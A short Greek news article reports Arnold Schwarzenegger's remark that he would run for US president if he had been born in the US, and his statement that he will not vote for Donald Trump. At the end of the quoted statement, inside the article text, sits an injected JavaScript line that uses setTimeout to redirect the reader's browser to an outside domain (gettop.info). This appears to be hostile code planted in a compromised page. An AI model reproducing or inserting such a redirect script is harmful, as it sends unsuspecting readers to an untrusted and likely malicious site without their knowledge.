Ευσεβής πόθος η προεδρία των ΗΠΑ για τον «Εξολοθρευτή»

0
16

 

«Αν είχα γεννηθεί στην Αμερική, θα έβαζα υποψηφιότητα», είπε σε συνέντευξή του στο Adweek ο Άρνολντ Σβαρτσενέγκερ. Σύμφωνα με τον αμερικανικό νόμο για να είναι κάποιος υποψήφιος πρόεδρος θα πρέπει να είναι γεννημένος στις ΗΠΑ. Όσον αφορά το γιατί τώρα; «Γιατί είναι μία πολύ καλή εποχή για να μπεις στην κούρσα», πρόσθεσε.

Αν και φανατικός Ρεπουμπλικανός και εκλεγμένος δύο φορές κυβερνήτης της Καλιφόρνια, ο Άρνολντ Σβαρτσενέγκερ δεν θα υποστηρίξει τον Ντόναλντ Τραμπ.

Στη μάχη για το χρίσμα των Ρεπουμπλικανών, ο Σβαρτσενέγκερ στήριζε τον γερουσιαστή του Οχάιο Τζον Κέισικ, ενώ μέσω Twitter ανακοίνωσε ότι δεν πρόκειται να ψηφίσει τον Τραμπ στις εκλογές: «Για πρώτη φορά από τότε που έγινα Αμερικανός πολίτης το 1983, δεν θα ψηφίσω Ρεπουμπλικανό για πρόεδρο. Οσο υπερήφανος κι είμαι να αποκαλούμαι Ρεπουμπλικανός, υπάρχει μία ταμπέλα που βάζω πάνω από όλες τις άλλες, εκείνη του Αμερικανού. Θέλω να υπενθυμίσω στους Ρεπουμπλικανούς ότι δεν είναι μόνο αποδεκτό να επιλέξεις την χώρα σου από το κόμμα σου, είναι και καθήκον». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here